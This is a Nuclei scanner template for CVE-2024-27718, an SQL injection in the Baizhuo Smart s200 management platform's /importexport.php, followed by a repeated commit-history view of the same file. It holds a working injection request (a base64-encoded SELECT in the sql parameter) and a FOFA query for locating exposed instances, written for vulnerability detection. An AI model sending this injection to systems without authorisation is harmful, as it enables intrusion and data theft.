nuclei-templates/http/cves/2024/CVE-2024-27718.yaml

id: CVE-2024-27718

info:
  name: Smart s200 Management Platform v.S200 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.
  reference:
    - https://github.com/tldjgggg/cve/blob/main/sql.md
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Smart管理平台"
  tags: cve,cve2024,smart-s45f,sqli

variables:
  num: "{{rand_int(9000000, 9999999)}}"
  cmd: "select+9,md5({{num}}),9"

http:
  - raw:
      - |
        GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: word
        part: header
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac317e1ecec2053960700ee389482ef23a2def68d0857dd2aa34ba292cf1fb3002200757a4af78313e507aeb9991d18c8cddb5f78341f409ec91f18298c3bf3eec3d:922c64590222798bb761d5b6d8e72950
Create CVE-2024-27718.yaml 2024-06-18 09:16:38 +00:00			`id: CVE-2024-27718`

			`info:`
			`name: Smart s200 Management Platform v.S200 - SQL Injection`
			`author: DhiyaneshDk`
			`severity: high`
			`description: \|`
			`SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.`
			`reference:`
			`- https://github.com/tldjgggg/cve/blob/main/sql.md`
			`classification:`
			`epss-score: 0.00043`
			`epss-percentile: 0.0866`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`fofa-query: body="Smart管理平台"`
			`tags: cve,cve2024,smart-s45f,sqli`

			`variables:`
			`num: "{{rand_int(9000000, 9999999)}}"`
			`cmd: "select+9,md5({{num}}),9"`

			`http:`
			`- raw:`
			`- \|`
			`GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "{{md5(num)}}"`
lint fix 2024-06-18 09:19:55 +00:00
Create CVE-2024-27718.yaml 2024-06-18 09:16:38 +00:00			`- type: word`
			`part: header`
			`words:`
			`- 'application/octet-stream'`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Jun 18 13:11:11 UTC 2024] :robot: 2024-06-18 13:11:11 +00:00			`# digest: 4a0a00473045022100ac317e1ecec2053960700ee389482ef23a2def68d0857dd2aa34ba292cf1fb3002200757a4af78313e507aeb9991d18c8cddb5f78341f409ec91f18298c3bf3eec3d:922c64590222798bb761d5b6d8e72950`